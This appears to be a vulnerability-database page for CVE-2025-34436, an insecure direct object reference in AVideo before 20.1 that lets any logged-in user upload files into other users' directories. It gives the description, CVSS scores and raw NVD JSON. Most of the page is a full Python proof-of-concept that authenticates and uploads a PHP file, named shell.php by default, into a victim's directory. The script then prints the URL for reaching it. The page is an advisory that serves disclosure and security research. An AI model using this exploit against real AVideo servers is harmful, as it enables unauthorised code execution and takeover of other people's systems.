Security Vulnerability Report
CVE-2025-34436 CVSS 8.8 HIGH

CVE-2025-34436

Published: 2025-12-17 20:15:54
Last Modified: 2025-12-19 19:15:51

Description

AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference (NVD records the weakness as CWE-639, authorization bypass through a user-controlled key; see the raw JSON below). The upload functionality verifies authentication but does not enforce ownership checks, so the only privilege an attacker needs is an ordinary account on the instance. Because the attacker chooses both the destination directory and the file content, the CVSS 3.1 vector below rates full confidentiality, integrity and availability impact; the practical risk is placing executable content (e.g. a PHP file, as in the PoC below) where the web server will execute it, if uploaded files are served from a location the interpreter handles.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
AVideo < 20.1 (per the description). Note the discrepancy with the NVD CPE match in the raw JSON below, which sets versionEndExcluding to 20.0: confirm the fixed version against the two patch commits listed there (4a53ab2056, c279999cbd) before treating a 20.0 install as unaffected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It writes a PHP file into another user's directory on the target, which is a persistent change to the system; run it only against instances you are authorized to test and remove the file afterwards. The upload endpoint and request field names in the script are not taken from the advisory text above — verify them against the referenced patch commits for the exact build under test before relying on the result.
python
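import sys

import requests

# CVE-2025-34436 PoC - IDOR Arbitrary File Upload in AVideo
# Target: AVideo < 20.1
#
# NOTE(review): the upload endpoint (/upload) and the form field names
# (user_id, type) used below are not given in the advisory text; confirm
# them against the referenced patch commits (4a53ab2056, c279999cbd) for the
# build under test before relying on this script.

LOGIN_TIMEOUT = 10   # seconds; login is a small JSON round-trip
UPLOAD_TIMEOUT = 30  # seconds; the upload carries the payload body


def _read_payload(path):
    """Return the bytes of the local file at *path*.

    Raises OSError (e.g. FileNotFoundError) when the file cannot be read; the
    caller turns that into a clean error message instead of a traceback.
    """
    with open(path, 'rb') as fh:
        return fh.read()


def exploit_avideo(target_url, username, password, target_user_id,
                   malicious_file_path, *, upload_name='shell.php'):
    """Upload a local file into another user's AVideo directory via the IDOR.

    Args:
        target_url: Base URL of the AVideo installation; a trailing slash is
            tolerated.
        username: Attacker account username (any authenticated user suffices).
        password: Attacker account password.
        target_user_id: Victim's user ID, i.e. the directory owner whose
            ownership the vulnerable upload handler fails to check.
        malicious_file_path: Local path of the file to upload.
        upload_name: Filename presented to the server (keyword-only; defaults
            to 'shell.php' to match the original PoC).

    Returns:
        True when the server answered the upload with HTTP 200, else False.
        An HTTP 200 is the only evidence this script has: it does not fetch
        the file back, so a 200 carrying an error body is still reported as
        success. Inspect the response if the expected file does not appear.
    """
    target_url = target_url.rstrip('/')

    # Read the payload first: a missing local file is an operator error and
    # should fail before any request reaches the target. In the original the
    # open() sat inside a try that only caught RequestException, so a bad
    # path produced a traceback.
    try:
        file_content = _read_payload(malicious_file_path)
    except OSError as e:
        print(f"[-] Cannot read payload file {malicious_file_path!r}: {e}")
        return False

    login_url = f"{target_url}/login.json"
    upload_url = f"{target_url}/upload"
    login_data = {'user': username, 'pass': password}
    files = {'file': (upload_name, file_content, 'application/x-php')}
    data = {
        'user_id': target_user_id,  # IDOR: the directory owner is attacker-chosen
        'type': 'video',
    }

    with requests.Session() as session:
        try:
            # Step 1: authenticate as the low-privilege attacker account.
            login_response = session.post(login_url, data=login_data,
                                          timeout=LOGIN_TIMEOUT)
            if login_response.status_code != 200:
                print(f"[-] Login failed - HTTP {login_response.status_code}")
                return False
            # NOTE(review): a JSON login endpoint may answer 200 with an error
            # body; the status code alone does not prove the session is
            # authenticated. Check the body if the upload is later rejected.
            print("[+] Successfully authenticated")

            # Step 2: upload into the victim's directory (the IDOR itself).
            upload_response = session.post(upload_url, files=files, data=data,
                                           timeout=UPLOAD_TIMEOUT)
        except requests.exceptions.RequestException as e:
            print(f"[-] Connection error: {e}")
            return False

    if upload_response.status_code != 200:
        print(f"[-] Upload failed - HTTP {upload_response.status_code}")
        return False

    print(f"[+] File uploaded to user_id {target_user_id}'s directory")
    # The location below is the one the original PoC assumed; it is not
    # confirmed by the advisory. Verify against the target's storage layout.
    print(f"[+] Access file at: {target_url}/videos/user_{target_user_id}/{upload_name}")
    return True


def main(argv):
    """Parse the command line, run the exploit and return a process exit code.

    Exit status is 1 on a usage error or a failed attempt and 0 on a reported
    success, so the script can be used from other tooling.
    """
    if len(argv) < 6:
        print("Usage: python cve-2025-34436.py <target_url> <username> <password> <target_user_id> <file_path>")
        print("Example: python cve-2025-34436.py http://target.com attacker pass123 5 shell.php")
        return 1
    target, user, pwd, target_uid, file_path = argv[1:6]
    return 0 if exploit_avideo(target, user, pwd, target_uid, file_path) else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))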

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34436", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.017", "lastModified": "2025-12-19T19:15:51.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference. The upload functionality verifies authentication but does not enforce ownership checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/c279999cbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}